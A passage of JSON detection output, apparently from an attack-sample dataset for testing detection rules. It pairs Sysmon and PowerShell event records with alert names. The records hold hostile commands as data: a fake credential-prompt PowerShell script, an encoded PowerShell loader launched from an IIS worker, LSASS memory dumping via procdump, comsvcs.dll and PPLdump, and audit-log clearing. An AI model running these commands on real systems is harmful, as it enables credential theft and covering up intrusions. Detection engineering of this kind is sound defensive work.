(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-AB27-5CB8-0000-002021CA0000","LogonId":"0xca21","ParentCommandLine":"Powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AC28-5CB8-0000-0010F3F70700","ParentProcessId":1200,"ProcessGuid":"365ABB72-AC38-5CB8-0000-0010365E0800","ProcessId":3576,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-18 16:56:24.833"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":14,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-18T16:56:24.893827Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-AB27-5CB8-0000-002021CA0000","LogonId":"0xca21","ParentCommandLine":"Powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AC28-5CB8-0000-0010F3F70700","ParentProcessId":1200,"ProcessGuid":"365ABB72-AD19-5CB8-0000-0010F4F40C00","ProcessId":3980,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-18 17:00:09.677"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":24,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-18T17:00:09.977481Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-18 17:03:03.311","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-AB28-5CB8-0000-0010F2E20000","ProcessId":1388,"RuleName":"technique_id=T1187,technique_name=Forced Authentication","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sysmon.evtx.lnk","UtcTime":"2019-04-18 17:03:03.311"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":32,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-18T17:03:03.321806Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-18 17:03:03.441","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-AB28-5CB8-0000-0010F2E20000","ProcessId":1388,"RuleName":"technique_id=T1187,technique_name=Forced Authentication","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HTools (vboxsrv) (D).lnk","UtcTime":"2019-04-18 17:03:03.441"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":33,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-18T17:03:03.441979Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PowerShell Credential Prompt"],"event":{"Event":{"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"","ScriptBlockId":"c7ca7056-b317-4fff-b796-05d8ef896dcd","ScriptBlockText":"function Invoke-LoginPrompt{\n$cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\")\n$username = \"$env:username\"\n$domain = \"$env:userdomain\"\n$full = \"$domain\" + \"\\\" + \"$username\"\n$password = $cred.GetNetworkCredential().password\nAdd-Type -assemblyname System.DirectoryServices.AccountManagement\n$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)\nwhile($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){\n $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\")\n $username = \"$env:username\"\n $domain = \"$env:userdomain\"\n $full = \"$domain\" + \"\\\" + \"$username\"\n $password = $cred.GetNetworkCredential().password\n Add-Type -assemblyname System.DirectoryServices.AccountManagement\n $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)\n $DS.ValidateCredentials(\"$full\", \"$password\") | out-null\n }\n $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password\n $output\n R{START_PROCESS}\n}\nInvoke-LoginPrompt"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"B5ABE6C2-675C-0001-A601-ACB55C67D501"},"EventID":4104,"EventRecordID":1123,"Execution_attributes":{"ProcessID":5500,"ThreadID":356},"Keywords":"0x0","Level":3,"Opcode":15,"Provider_attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"},"Security_attributes":{"UserID":"S-1-5-21-3461203602-4096304019-2269080069-1000"},"Task":2,"TimeCreated_attributes":{"SystemTime":"2019-09-09T13:35:09.315230Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"IEWIN7","Correlation":null,"EventID":1102,"EventRecordID":4987,"Execution_attributes":{"ProcessID":824,"ThreadID":6060},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-04-27T19:27:55.274060Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"IEWIN7","SubjectLogonId":"0xffa8","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Encoded PowerShell Command Line","Shells Spawned by Web Servers"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\Temp\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B26B-5CEA-0000-002023240800","LogonId":"0x82423","ParentCommandLine":"c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\" -v \"v2.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h \"C:\\inetpub\\temp\\apppools\\DefaultAppPool\\DefaultAppPool.config\" -w \"\" -m 0 -t 20","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","ParentProcessGuid":"365ABB72-3251-5CEB-0000-00109E06E100","ParentProcessId":748,"ProcessGuid":"365ABB72-3D4A-5CEB-0000-0010FA93FD00","ProcessId":2584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-27 01:28:42.700"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":5875,"Execution_attributes":{"ProcessID":324,"ThreadID":2260},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T01:28:42.711005Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File","Procdump Usage"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 19:09:41.318","Image":"C:\\Users\\IEUser\\Desktop\\procdump.exe","ProcessGuid":"365ABB72-9B75-5C8E-0000-0010013F1200","ProcessId":1856,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\lsass.exe_190317_120941.dmp","UtcTime":"2019-03-17 19:09:41.318"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":4433,"Execution_attributes":{"ProcessID":344,"ThreadID":2032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T19:09:41.328868Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 19:10:02.058","Image":"C:\\Windows\\system32\\taskmgr.exe","ProcessGuid":"365ABB72-9B85-5C8E-0000-0010C4CC1200","ProcessId":3576,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\lsass (2).DMP","UtcTime":"2019-03-17 19:10:02.058"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":4441,"Execution_attributes":{"ProcessID":344,"ThreadID":2032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T19:10:03.991455Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WScript or CScript Dropper"],"event":{"Event":{"EventData":{"CommandLine":"cscript c:\\ProgramData\\memdump.vbs notepad.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Console Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC","Image":"C:\\Windows\\System32\\cscript.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1B6A-5D69-0000-0020E5810E00","LogonId":"0xe81e5","ParentCommandLine":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1B6C-5D69-0000-00106F060F00","ParentProcessId":2128,"ProcessGuid":"747F3D96-1C6F-5D69-0000-0010323C1F00","ProcessId":2576,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-30 12:54:07.823"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":32151,"Execution_attributes":{"ProcessID":3292,"ThreadID":928},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-30T12:54:07.873789Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A","Image":"C:\\Windows\\System32\\cscript.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"747F3D96-1C6F-5D69-0000-0010323C1F00","ProcessId":2576,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-08-30 12:54:08.127"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":32153,"Execution_attributes":{"ProcessID":3292,"ThreadID":4120},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-08-30T12:54:08.257123Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Process Dump via Comsvcs DLL"],"event":{"Event":{"EventData":{"CommandLine":"rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 4868 C:\\Windows\\System32\\notepad.bin full","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1B6A-5D69-0000-0020E5810E00","LogonId":"0xe81e5","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-1C70-5D69-0000-0010D4551F00","ParentProcessId":1144,"ProcessGuid":"747F3D96-1C70-5D69-0000-0010C9661F00","ProcessId":2888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-30 12:54:08.331"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":32154,"Execution_attributes":{"ProcessID":3292,"ThreadID":928},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-30T12:54:08.354049Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":887106,"Execution_attributes":{"ProcessID":8,"ThreadID":6640},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-07-22T20:29:27.321769Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x3a17a","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["LSASS Memory Dumping"],"event":{"Event":{"EventData":{"CommandLine":"PPLdump.exe -v lsass lsass.dmp","Company":"?","CurrentDirectory":"c:\\Users\\IEUser\\Desktop\\","Description":"?","FileVersion":"?","Hashes":"SHA1=F1C0C54AA13037F46F55B721F7E2A2349A30DBCF,MD5=DBCA6A3860A106333FF6BE6306B2B186,SHA256=68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41,IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74","Image":"C:\\Users\\IEUser\\Desktop\\PPLdump.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-EFC5-6081-0000-00203ACE0B00","LogonId":"0xbce3a","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-F040-6081-0000-001046AC1B00","ParentProcessId":4864,"ProcessGuid":"747F3D96-F415-6081-0000-001040FE4900","ProcessId":6316,"Product":"?","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2021-04-22 22:09:25.377"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564589,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:25.389633Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Processes Suspicious Parent Directory","LSASS Memory Dumping"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\services.exe 652 \"lsass.dmp\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Desktop\\","Description":"Services and Controller app","FileVersion":"10.0.17763.1075 (WinBuild.160101.0800)","Hashes":"SHA1=617A0A0BAAB180541DB739C4A6851D784943C317,MD5=DB896369FB58241ADF28515E3765C514,SHA256=A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC,IMPHASH=7D2820FC8CAF521DC2058168B480D204","Image":"C:\\Windows\\System32\\services.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6E19-6082-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"services.exe","ParentCommandLine":"PPLdump.exe -v lsass lsass.dmp","ParentImage":"C:\\Users\\IEUser\\Desktop\\PPLdump.exe","ParentProcessGuid":"747F3D96-F415-6081-0000-001040FE4900","ParentProcessId":6316,"ProcessGuid":"747F3D96-F416-6081-0000-001033034A00","ProcessId":7188,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2021-04-22 22:09:26.016"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564593,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:26.081337Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File","CreateMiniDump Hacktool"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-04-22 22:09:26.157","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-F416-6081-0000-001033034A00","ProcessId":7188,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\lsass.dmp","UtcTime":"2021-04-22 